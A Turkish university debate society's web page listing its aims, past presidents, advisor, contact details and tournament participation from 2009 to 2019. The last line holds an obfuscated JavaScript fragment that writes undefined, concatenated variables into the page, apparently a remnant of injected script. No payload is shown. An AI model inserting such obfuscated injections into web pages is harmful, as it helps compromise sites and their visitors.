Dokuz Eylül Üniversitesi öğrencilerinin öğrenimleri sırasında bireysel, sosyal ve kültürel açıdan gelişmeleri için etkinliklerde bulunmak, tartışma bilincini yerleştirmek ve demokratik bir şekilde tartışma becerisi geliştirmek, topluluk karşısında rahat konuşabilme, beden dilini doğru kullanabilme becerisini oluşturmak amacıyla kurulan topluluğumuz ulusal ve uluslar arası müsabakalarda üniversitemizi temsil etmektedir.Empati kurma, yapıcı tartışma kültürünü aşılamak; araştırma, ikna etme, sorgulama, topluluk önünde konuşabilme ve düşüncelerini makul bir biçimde ifade edebilme becerileri kazandırmak; takım çalışması yapabilme ve ortak hareket edebilme yetisi kazandırmak; ülkemizde ve dünyada yaşanan güncel gelişmeleri takip eden, entelektüel birikimi yüksek ve farkındalık sahibi bireyler olabilme noktasında katkı sağlamak.Kuruluş Tarihi: 2003

Başkan: Furkan ÇAPRAZ (2019-2020)

Metin Murat TAŞDEMİR (2018-2019)

Umut YALÇIN (2017-2018)

Melek YAZIBAĞLI (2017-2018)

Malak Eibech (2015-2016-2017)

Seda Yağmur SÜMER (2015-2016)

Can ŞİMŞEK (2014-2015)

Deniz YENİKAYA (2013-2014)

Sena YAZIBAĞLI (2011-2012-2013)

Sibel UTAR 2010-2011

Danışman: Yard.Doç.Dr.Canan ERKAN

Topluluk Odası: Hukuk Fakültesi, 4.Kat, 405

instagram: deumunazara
facebook: deumt (dokuz eylül üniversitesi münazara topluluğu)

2018-2019 Etkinlikler:

İzmir Ekonomi Üniversitesi, Özyeğin Üniversitesi, Acıbadem Üniversitesi, Koç Üniversitesi, Selçuk Üniversitesi gibi okulların turnuvalarına takım ve jüri olarak katılım sağlandı.

İzmir Ekonomi Üniversitesi ve Yaşar Üniversitesi'yle beraber İzmir'de münazara kültürünü güçlendirmek adına ortak toplantılar ve dostluk maçları düzenlendi.

İzmir genelinde düzenlenen münazara eğitimlerine katılım sağlandı, kulüp başkanımız Metin Murat Taşdemir bu eğitimlerde eğitmenlik yaptı.

Topluluk içerisinde düzenli olarak teorik ve pratik çalışmalar yapıldı.

Kulüp saatleri dışında diğer üniversitelerin münazara topluluklarıyla ve kendi topluluğumuz içinde sosyal faaliyetler düzenlendi.

- 22-24 Şubat 2014 Çaylaklar Turnuvası katılım gerçekleştirildi.

- 25-26-27 Nisan 2014 -Ankara Çankaya Üniversitesi Münazara turnuvasına  katılım gerçekleştirildi.

- 8-10 Aralık 2012 tarihleri arasında ODTÜ-Ankara'''da düzenlenen Üniversitelerarası Münazara Turnuvasına katılım gerçekleştirildi.

- 16-17-18 Kasım 2012 Şehir Üniversitesi- İstanbul Münazara Turnuvasına katılım gerçekleştirildi.

- Selçuk Üniversitesi Münazara Turnuvasına katılım gerçekleştirildi.

- Yaşar Üniversitesi MUNTR etkinliğine katılım gerçekleştirildi.

- Selçuk Üniversitesi Münazara Turnuvasına katılım gerçekleştirildi.

- İzmir Üniversiteleri arasında düzenlenmiş olan İzmir Üniversiteleri Platformu Şenliğinde Güneri Civaoğlu moderatörlüğünde “Doğruya Doğru” Müzakeresinde Üniversitemizi başarıyla temsil etmişlerdir.

- 4-5-6 Aralık 2009 tarihlerinde D.E.Ü. Münazara Topluluğu tarafından düzenlenen "Ege Bölge Ligi 1.Ayak Münazara Turnuvası" etkinliğine ev sahipliği yapmıştır.

var QNshcQg1='';window["document"]["write"] (FZC1+s2+s3+s4+s5+s6);